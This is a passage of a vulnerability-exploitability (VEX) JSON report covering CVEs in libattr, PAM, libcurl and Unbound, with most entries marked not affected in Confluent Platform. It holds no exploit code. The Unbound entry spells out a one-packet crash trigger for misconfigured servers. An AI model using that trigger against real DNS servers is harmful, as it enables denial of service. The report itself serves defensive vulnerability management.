          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        59
      ],
      "description": "attr before version 2.6.0 contains a symlink traversal vulnerability in the getfattr and setfattr utilities that allows local attackers to escalate privileges by replacing a pathname component with a symbolic link during directory hierarchy traversal. Attackers who control a pathname component can redirect getfattr and setfattr operations to arbitrary files by substituting a symlink, leading to local privilege escalation when getfattr or setfattr is invoked by a privileged process over an attacker-controlled path.",
      "recommendation": "Upgrade libattr to version 2.6.0-1.el8_10",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54371"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34889"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56133"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54371"
        },
        {
          "url": "https://bugzilla.redhat.com/2490283"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2490283"
        },
        {
          "url": "https://cgit.git.savannah.nongnu.org/cgit/attr.git/commit/?id=49f79e947270f06940b9100fa638f85dddc4aa7f"
        },
        {
          "url": "https://cgit.git.savannah.nongnu.org/cgit/attr.git/commit/?id=c440855d6b33446edf4b5eb1a2d892281f15a99b"
        },
        {
          "url": "https://errata.almalinux.org/8/ALSA-2026-56133.html"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-54371.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-56133.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54371"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-54371.json"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54371"
        },
        {
          "url": "https://www.vulncheck.com/advisories/attr-symlink-traversal-privilege-escalation-via-getfattr-setfattr"
        }
      ],
      "published": "2026-06-29T14:16:57+00:00",
      "updated": "2026-08-19T12:18:32+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.4.48-3.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libattr@2.4.48-3.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-54411",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        208
      ],
      "description": "Linux-PAM through 1.7.2 contains an observable timing discrepancy (CWE-208) in the pam_userdb module's plaintext-password comparison path in modules/pam_userdb/pam_userdb.c that allows a local or network-adjacent attacker able to repeatedly drive authentication through a calling service to recover the plaintext password of a target account by measuring response-timing differences.",
      "recommendation": "Upgrade pam to version 1.3.1-40.el8_10",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54411"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56131"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54411"
        },
        {
          "url": "https://bugzilla.redhat.com/2488766"
        },
        {
          "url": "https://cwe.mitre.org/data/definitions/208.html"
        },
        {
          "url": "https://errata.almalinux.org/8/ALSA-2026-56131.html"
        },
        {
          "url": "https://github.com/linux-pam/linux-pam"
        },
        {
          "url": "https://github.com/linux-pam/linux-pam/blob/master/libpam/include/pam_inline.h"
        },
        {
          "url": "https://github.com/linux-pam/linux-pam/blob/master/modules/pam_userdb/pam_userdb.c#L327"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-54411.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-56131.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54411"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8601-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54411"
        }
      ],
      "published": "2026-06-14T18:17:20+00:00",
      "updated": "2026-08-10T12:17:17+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.3.1-39.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-5545",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        613
      ],
      "description": "libcurl might in some circumstances reuse the wrong connection when asked to\ndo an authenticated HTTP(S) request after a Negotiate-authenticated one, when\nboth use the same host.\n\nlibcurl features a pool of recent connections so that subsequent requests can\nreuse an existing connection to avoid overhead.\n\nWhen reusing a connection a range of criteria must be met. Due to a logical\nerror in the code, a request that was issued by an application could\nwrongfully reuse an existing connection to the same server that was\nauthenticated using different credentials.\n\nAn application that first uses Negotiate authentication to a server with\n`user1:password1` and then does another operation to the same server asking\nfor any authentication method but for `user2:password2` (while the previous\nconnection is still alive) - the second request gets confused and wrongly\nreuses the same connection and sends the new request over that connection\nthinking it uses a mix of user1's and user2's credentials when it is in fact\nstill using the connection authenticated for user1...",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5545"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5545"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-5545.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-5545.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-6g7g-56fm-f8mp"
        },
        {
          "url": "https://hackerone.com/reports/3642555"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5545"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8525-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5545"
        }
      ],
      "published": "2026-05-13T13:01:56+00:00",
      "updated": "2026-06-17T10:59:12+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-55990",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        457
      ],
      "description": "In NLnet Labs Unbound 1.7.0 up to and including 1.25.1, when the 'dnscrypt:' clause lists more 'dnscrypt-provider-cert:' files than there are matching 'dnscrypt-secret-key:' files, Unbound fills only the matched prefix and leaves the tail slots at the '0xdb' fill that libsodium's allocator writes into every allocation. Unbound would then iterate over the number of cert files, not the actual slots, so it walks into a slot with garbage data filled with '0xdb' bytes. Any unauthenticated client that sends one UDP datagram of \u2265 68 bytes whose first 8 bytes are '0xdb' to 'dnscrypt-port' will use that garbage entry which leads to a garbage dereference killing the server. This is a silent faulty configuration that goes unnoticed until triggered with the right client query. Unbound needs to be compiled with DNSCrypt support ('--enable-dnscrypt').",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-55990"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-55990"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55990"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-55990"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-55990.txt"
        }
      ],
      "published": "2026-07-22T14:17:21+00:00",
      "updated": "2026-07-24T14:24:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
